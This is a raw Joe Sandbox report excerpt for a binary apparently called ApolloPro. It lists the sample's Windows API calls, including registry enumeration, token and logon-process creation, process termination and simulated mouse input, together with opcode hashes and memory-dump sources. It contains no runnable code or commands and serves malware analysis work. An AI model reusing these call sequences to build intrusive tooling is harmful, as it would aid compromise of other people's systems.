                                                                                              • Opcode Fuzzy Hash: 35a21e40a2b81de9758b837175022873cd86c43d5bc943926d2082e89295e3d8
                                                                                              • Instruction Fuzzy Hash: E4F06232515B11D9E7B87774BC0369A26A7DF41776F11571DFC50D51D3EF1084094178
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00654282,?), ref: 006541D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 006541DA
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 006541E6
                                                                                              • DecodePointer.KERNEL32(00000001,00654282,?), ref: 00654203
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoInitialize$combase.dll
                                                                                              • API String ID: 3489934621-340411864
                                                                                              • Opcode ID: 7bad9b22bb23b64af09c1113abc8691d7f7bedd0ebb81658f7d25280c452f096
                                                                                              • Instruction ID: 65e0bf24950ac35974d7cf2741a0f7909c3c8363aca7ec718ebdb627c7aeeaee
                                                                                              • Opcode Fuzzy Hash: 7bad9b22bb23b64af09c1113abc8691d7f7bedd0ebb81658f7d25280c452f096
                                                                                              • Instruction Fuzzy Hash: 5DE01270550751EFEB105B70DD4DF743557BB1470AF606414B902D52A0CBB56585CF00
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006541A8), ref: 006542A8
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 006542AF
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 006542BA
                                                                                              • DecodePointer.KERNEL32(006541A8), ref: 006542D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                              • API String ID: 3489934621-2819208100
                                                                                              • Opcode ID: 76c1de566a3bf4a369e449ca71710f9b0d75fba35bf6588c06d0cef7e2d924c4
                                                                                              • Instruction ID: 7491bf4a76aa4ccb4b4116d68b55cb6af0650286f2ca3e2aff38f1a6ec8aaee3
                                                                                              • Opcode Fuzzy Hash: 76c1de566a3bf4a369e449ca71710f9b0d75fba35bf6588c06d0cef7e2d924c4
                                                                                              • Instruction Fuzzy Hash: 5FE0B670550B11EFEB109B60ED0DFB43A67BB04B06F506118F602D5AA0CBB4BA58CA10
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 006321B8
                                                                                              • GetWindowRect.USER32(?,?), ref: 006321F9
                                                                                              • ScreenToClient.USER32(?,?), ref: 00632221
                                                                                              • GetClientRect.USER32(?,?), ref: 00632350
                                                                                              • GetWindowRect.USER32(?,?), ref: 00632369
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                              • String ID:
                                                                                              • API String ID: 1296646539-0
                                                                                              • Opcode ID: 0f4a91fcb331a2798e3eb198a7920e909f8d1fb37f5f7a94d38703b73a04773f
                                                                                              • Instruction ID: 32ecff2791e928298f2adc56b491f7774e13d99d12835b4ced06c9dcc9cb50d5
                                                                                              • Opcode Fuzzy Hash: 0f4a91fcb331a2798e3eb198a7920e909f8d1fb37f5f7a94d38703b73a04773f
                                                                                              • Instruction Fuzzy Hash: 1EB14C3990024ADBDF10CFA8C9907EEB7B2FF08710F149129ED59EB254DB35AA51CB94
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3253778849-0
                                                                                              • Opcode ID: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                                                              • Instruction ID: 62f87f5ef40201828884feb06e5161927dc4f4b08a2201901b938d7f6ea1bf95
                                                                                              • Opcode Fuzzy Hash: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                                                              • Instruction Fuzzy Hash: 3E61AE3050025AABCF51EF60CC81FFE77AAAF06308F04455DF8555B692DB35AD45CB98
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B091D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B095D
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006B0980
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006B09A9
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006B09EC
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B09F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4046560759-0
                                                                                              • Opcode ID: 3569bfb620ca0159aded0348502a49a1a0b3408404428da2491ba3b737b847ca
                                                                                              • Instruction ID: 1e96fad24f531da6484d4d8a09cb893c908cd33d7f0162fc4a87d7a4f466996e
                                                                                              • Opcode Fuzzy Hash: 3569bfb620ca0159aded0348502a49a1a0b3408404428da2491ba3b737b847ca
                                                                                              • Instruction Fuzzy Hash: 55517A71208200AFE750EF64C895EAFBBEAFF85314F04491DF5958B2A2DB31E945CB52
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 006B5E38
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 006B5E6F
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006B5E97
                                                                                              • GetMenuItemID.USER32(?,?), ref: 006B5F06
                                                                                              • GetSubMenu.USER32(?,?), ref: 006B5F14
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 006B5F65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                              • String ID:
                                                                                              • API String ID: 650687236-0
                                                                                              • Opcode ID: 2878ee91e3ff625b7f8addf718f9767f4e59d506bd62cc75db92ce7532dde3b6
                                                                                              • Instruction ID: 5717f7e11d320f709c9c607648025169234c7626963b1ac97a7ccc90f74872d3
                                                                                              • Opcode Fuzzy Hash: 2878ee91e3ff625b7f8addf718f9767f4e59d506bd62cc75db92ce7532dde3b6
                                                                                              • Instruction Fuzzy Hash: 69517A75A01615EFDB51EF64C845AEEB7BAEF48310F104059E902BB391CB70AE828F95
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0068F6A2
                                                                                              • VariantClear.OLEAUT32(00000013), ref: 0068F714
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0068F76F
                                                                                              • _memmove.LIBCMT ref: 0068F799
                                                                                              • VariantClear.OLEAUT32(?), ref: 0068F7E6
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0068F814
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1101466143-0
                                                                                              • Opcode ID: 3beda1fd1b4b51012f0cd48d781061b7d43cf202de42b51ff2a8c6103518fef5
                                                                                              • Instruction ID: 34964dec9c7f7e79eaf9fd8b9e77a6bd30c8548ea3d022a767fbdf23bda4f23c
                                                                                              • Opcode Fuzzy Hash: 3beda1fd1b4b51012f0cd48d781061b7d43cf202de42b51ff2a8c6103518fef5
                                                                                              • Instruction Fuzzy Hash: 2B5148B5A00209EFDB14DF58D884AAAB7F9FF4C354F15856AE959DB300D730E911CBA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006929FF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692A4A
                                                                                              • IsMenu.USER32(00000000), ref: 00692A6A
                                                                                              • CreatePopupMenu.USER32 ref: 00692A9E
                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00692AFC
                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00692B2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3311875123-0
                                                                                              • Opcode ID: 863fcc4b2d63f7c4785b4cb1243a7b2b0a236db3131ecab65f91de1d5df2bceb
                                                                                              • Instruction ID: de3e3ea3dd6b0b43021233c5273581d7ae91a6678220b6e65b18322c13438f51
                                                                                              • Opcode Fuzzy Hash: 863fcc4b2d63f7c4785b4cb1243a7b2b0a236db3131ecab65f91de1d5df2bceb
                                                                                              • Instruction Fuzzy Hash: C951CD70A0030BEFDF25CF68D8A8BEEBBFAAF14318F104119E8119B6A5D7709945CB51
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00631B76
                                                                                              • GetWindowRect.USER32(?,?), ref: 00631BDA
                                                                                              • ScreenToClient.USER32(?,?), ref: 00631BF7
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00631C08
                                                                                              • EndPaint.USER32(?,?), ref: 00631C52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 1827037458-0
                                                                                              • Opcode ID: 673e3915bbbf321aaee35a0a8ed66ab5f6f77bb9fdf91c95079b5b202c3dd1c5
                                                                                              • Instruction ID: c6c56ecd43286dd21a8862fde8d432d940f12307d83d0ec1abd640e8fb7d1dc2
                                                                                              • Opcode Fuzzy Hash: 673e3915bbbf321aaee35a0a8ed66ab5f6f77bb9fdf91c95079b5b202c3dd1c5
                                                                                              • Instruction Fuzzy Hash: 3941AF30104300EFD711DF24CC88FBA7BEAEB5A360F141669F9A5CB2A1C7309945DBA1
                                                                                              APIs
                                                                                              • ShowWindow.USER32(006F77B0,00000000,00DD52C0,?,?,006F77B0,?,006BBC1A,?,?), ref: 006BBD84
                                                                                              • EnableWindow.USER32(?,00000000), ref: 006BBDA8
                                                                                              • ShowWindow.USER32(006F77B0,00000000,00DD52C0,?,?,006F77B0,?,006BBC1A,?,?), ref: 006BBE08
                                                                                              • ShowWindow.USER32(?,00000004,?,006BBC1A,?,?), ref: 006BBE1A
                                                                                              • EnableWindow.USER32(?,00000001), ref: 006BBE3E
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 006BBE61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,006A550C,?,?,00000000,00000001), ref: 006A7796
                                                                                                • Part of subcall function 006A406C: GetWindowRect.USER32(?,?), ref: 006A407F
                                                                                              • GetDesktopWindow.USER32 ref: 006A77C0
                                                                                              • GetWindowRect.USER32(00000000), ref: 006A77C7
                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006A77F9
                                                                                                • Part of subcall function 006957FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695877
                                                                                              • GetCursorPos.USER32(?), ref: 006A7825
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006A7883
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                              APIs
                                                                                                • Part of subcall function 00688CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00688CDE
                                                                                                • Part of subcall function 00688CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00688CE8
                                                                                                • Part of subcall function 00688CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00688CF7
                                                                                                • Part of subcall function 00688CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00688CFE
                                                                                                • Part of subcall function 00688CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00688D14
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,0068904D), ref: 00689482
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0068948E
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00689495
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 006894AE
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0068904D), ref: 006894C2
                                                                                              • HeapFree.KERNEL32(00000000), ref: 006894C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00689200
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00689207
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00689216
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00689221
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00689250
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00689264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0068C34E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0068C35F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0068C366
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0068C36E
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0068C385
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0068C397
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              APIs
                                                                                                • Part of subcall function 006316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                                • Part of subcall function 006316CF: BeginPath.GDI32(?), ref: 0063174F
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006BC57C
                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 006BC590
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006BC59E
                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 006BC5AE
                                                                                              • EndPath.GDI32(00000000), ref: 006BC5BE
                                                                                              • StrokePath.GDI32(00000000), ref: 006BC5CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006507EC
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006507F4
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006507FF
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0065080A
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00650812
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0065081A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006959B4
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006959CA
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 006959D9
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959E8
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959F2
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 006977FE
                                                                                              • EnterCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 0069780F
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,0063C2B6,?,?), ref: 0069781C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0063C2B6,?,?), ref: 00697829
                                                                                                • Part of subcall function 006971F0: CloseHandle.KERNEL32(00000000,?,00697836,?,0063C2B6,?,?), ref: 006971FA
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0069783C
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 00697843
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: 82c7f6cfd381b83e47fb1f09f2955db94a88fa998274b1d2a758c5e26a6eead8
                                                                                              • Instruction ID: 21e1237cac05d90903fd4e4a376871f04268e093d710798ec9e130b8d3b8fbd5
                                                                                              • Opcode Fuzzy Hash: 82c7f6cfd381b83e47fb1f09f2955db94a88fa998274b1d2a758c5e26a6eead8
                                                                                              • Instruction Fuzzy Hash: A1F05E32145212EBE7112B64EC8CEFB772FFF45302F142425F102954A0CBB95901DB60
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00689555
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00689561
                                                                                              • CloseHandle.KERNEL32(?), ref: 0068956A
                                                                                              • CloseHandle.KERNEL32(?), ref: 00689572
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0068957B
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00689582
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: 266d434c5e59f971c7cc957562e5735d2480193532040ae285c10ab3784564d4
                                                                                              • Instruction ID: 5a3a4be1f4e0bd0617adea486e3abc42226ea6937fa03008d95445c1f538b36b
                                                                                              • Opcode Fuzzy Hash: 266d434c5e59f971c7cc957562e5735d2480193532040ae285c10ab3784564d4
                                                                                              • Instruction Fuzzy Hash: 9BE0E53A004542FBEB011FE6EC0CD6AFF3AFF49722B145220F21981470CB32A460DB60
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A8CFD
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006A8E0C
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A8F84
                                                                                                • Part of subcall function 00697B1D: VariantInit.OLEAUT32(00000000), ref: 00697B5D
                                                                                                • Part of subcall function 00697B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00697B66
                                                                                                • Part of subcall function 00697B1D: VariantClear.OLEAUT32(00000000), ref: 00697B72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
